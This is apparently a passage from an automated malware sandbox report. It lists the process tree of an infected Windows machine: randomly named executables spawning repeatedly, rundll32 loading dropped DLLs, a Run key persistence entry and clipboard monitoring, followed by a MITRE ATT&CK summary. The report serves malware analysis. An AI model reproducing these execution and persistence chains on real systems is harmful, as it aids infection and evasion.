C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11828
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10864
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12348
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2810⤵
- Program crash
- Enumerates system info in registry
PID:13928
-
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10932
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12164
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13416
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11728
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11724
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:4300
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11500
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12276
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12708
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9168
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:14860
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13500
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:15088
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:14092
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:15160
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11512 -s 2810⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:13140
-
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:15148
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12232
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:14136
-
-
-
C:\Users\Admin\Documents\j_eFVLtqA7kSAzcNqncsuUtg.exe"C:\Users\Admin\Documents\j_eFVLtqA7kSAzcNqncsuUtg.exe"8⤵PID:8908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8908 -s 2809⤵
- Program crash
- Checks processor information in registry
PID:9860
-
-
-
C:\Users\Admin\Documents\YnTmAKYIsLc89pYvd9PphF1C.exe"C:\Users\Admin\Documents\YnTmAKYIsLc89pYvd9PphF1C.exe"8⤵PID:6904
-
C:\Users\Admin\Documents\YnTmAKYIsLc89pYvd9PphF1C.exe"C:\Users\Admin\Documents\YnTmAKYIsLc89pYvd9PphF1C.exe" -u9⤵PID:2176
-
-
-
C:\Users\Admin\Documents\L0CqMRweDWlOuC5qBSMsI5gb.exe"C:\Users\Admin\Documents\L0CqMRweDWlOuC5qBSMsI5gb.exe"8⤵PID:2120
-
C:\Users\Admin\AppData\Local\Temp\is-ON1KI.tmp\L0CqMRweDWlOuC5qBSMsI5gb.tmp"C:\Users\Admin\AppData\Local\Temp\is-ON1KI.tmp\L0CqMRweDWlOuC5qBSMsI5gb.tmp" /SL5="$302C2,138429,56832,C:\Users\Admin\Documents\L0CqMRweDWlOuC5qBSMsI5gb.exe"9⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:9336 -
C:\Users\Admin\AppData\Local\Temp\is-OVG54.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OVG54.tmp\Setup.exe" /Verysilent10⤵
- Drops file in Program Files directory
PID:9104
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\pS1lAs69AU4dP7M5ZxgsPSZ4.exe"C:\Users\Admin\Documents\pS1lAs69AU4dP7M5ZxgsPSZ4.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3352 -
C:\Users\Admin\AppData\Roaming\7388481.exe"C:\Users\Admin\AppData\Roaming\7388481.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5752 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Suspicious behavior: SetClipboardViewer
PID:4420
-
-
-
C:\Users\Admin\AppData\Roaming\7170707.exe"C:\Users\Admin\AppData\Roaming\7170707.exe"3⤵PID:5220
-
-
C:\Users\Admin\AppData\Roaming\8653564.exe"C:\Users\Admin\AppData\Roaming\8653564.exe"3⤵PID:5524
-
-
C:\Users\Admin\AppData\Roaming\4492251.exe"C:\Users\Admin\AppData\Roaming\4492251.exe"3⤵PID:6060
-
-
C:\Users\Admin\AppData\Roaming\2729210.exe"C:\Users\Admin\AppData\Roaming\2729210.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5572 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5572 -s 23444⤵
- Program crash
PID:5004
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.21⤵
- Modifies data under HKEY_USERS
PID:3616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:2528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2052 -ip 20521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2000 -ip 20001⤵PID:492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2376 -ip 23761⤵PID:948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 828 -ip 8281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 552 -ip 5521⤵PID:3060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3804 -ip 38041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1872 -ip 18721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4556 -ip 45561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 472 -ip 4721⤵PID:5644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4900 -ip 49001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1608
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6280 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6364 -s 4523⤵
- Program crash
PID:7076
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6364 -ip 63641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6596
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4704
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Loads dropped DLL
PID:7124 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 4562⤵
- Program crash
PID:3608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 7124 -ip 71241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5376
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:6092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1620 -ip 16201⤵PID:1288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7128 -ip 71281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7892
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 412 -p 5572 -ip 55721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1860 -ip 18601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1924
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 520 -p 5728 -ip 57281⤵PID:8432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 9088 -ip 90881⤵PID:8848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 8704 -ip 87041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 4088 -ip 40881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 1192 -ip 11921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 8840 -ip 88401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5632 -ip 56321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5524 -ip 55241⤵PID:9508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 8908 -ip 89081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9756
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 548 -p 6604 -ip 66041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 9484 -ip 94841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8564 -ip 85641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 8688 -ip 86881⤵PID:1500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5540 -ip 55401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4880 -ip 48801⤵PID:9128
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 7620 -ip 76201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5028 -ip 50281⤵PID:5976
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8520 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7756 -s 4523⤵
- Program crash
PID:8704
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 7756 -ip 77561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 7232 -ip 72321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 9788 -ip 97881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1916
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 8260 -ip 82601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9472
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 8300 -ip 83001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5764 -ip 57641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 8124 -ip 81241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 10008 -ip 100081⤵PID:3028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10816 -ip 108161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 7832 -ip 78321⤵PID:4068
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 656 -p 10036 -ip 100361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 8104 -ip 81041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6376 -ip 63761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1288 -ip 12881⤵PID:2576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 9656 -ip 96561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10160 -ip 101601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 7336 -ip 73361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 10284 -ip 102841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6500 -ip 65001⤵PID:7320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 1332 -ip 13321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4448 -ip 44481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7680 -ip 76801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 12728 -ip 127281⤵PID:8240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 13120 -ip 131201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:13032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 12796 -ip 127961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 10484 -ip 104841⤵PID:4004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7300 -ip 73001⤵PID:9300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7100 -ip 71001⤵PID:4400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 14292 -ip 142921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 13352 -ip 133521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1032 -ip 10321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 10536 -ip 105361⤵PID:6884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 13016 -ip 130161⤵PID:4932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 12252 -ip 122521⤵PID:10004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 13640 -ip 136401⤵PID:13192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5288 -ip 52881⤵PID:12800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 13496 -ip 134961⤵PID:9044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 9800 -ip 98001⤵PID:8216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 11512 -ip 115121⤵PID:14584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 11536 -ip 115361⤵PID:15492
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1